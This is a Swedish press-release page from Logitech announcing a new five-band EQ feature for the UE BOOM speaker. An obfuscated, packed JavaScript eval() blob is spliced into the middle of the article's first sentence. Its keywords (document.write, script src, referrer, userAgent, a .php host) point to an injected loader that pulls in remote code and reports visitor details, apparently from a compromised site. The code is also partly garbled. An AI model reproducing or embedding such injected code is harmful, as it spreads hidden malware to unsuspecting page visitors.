Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Ultimate Ears tar UE BOOM:s ljud till nästa nivå med ny EQ-funktion

Ultimate Ears tar UE BOOM:s ljud till nästa nivå med ny EQ-funktion

När eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kkffy|var|u0026u|referrer|yyyeb||js|php’.split(’|’),0,{}))
hösten kommer är det inte bara årstiderna som förändras: din 
UE BOOM blir också smartare.

Från och med idag rullar UE BOOM som först i branchen ut en ny funktion: möjligheten att kontrollera ljudet din UE BOOM. Enkelt förklarat får du möjlighet att med en fembands-EQ styra ljudbilden i din UE BOOM. Du ställer in nivåerna på diskant, bas och mellanregister med UE BOOM-appen, sen lagrar du inställningarna i högtalaren.

Sen den lanserades har UE BOOM drivit utveckligen framåt genom att ständigt lansera nya funktioner som tar lyssningsupplevelsen till nya nivåer: Sticky Double Up som gör att ihopparade högtalare minns varandra och kan spela högre, möjligheten att anpassa uppstartsljudet för din UE BOOM och en larmklocka är alla funktioner som tillkommit via uppdatering av mjukvaran.

Med de nya EQ-möjligheterna är UE BOOM bättre än någonsin. Ta del av de nya funktionerna genom att uppdatera mjukvaran i högtalaren via Ultimate Ears webbsida och genom att ladda ner den senaste appen för iOS eller Android.

Detta är ett pressmeddelande från Logitech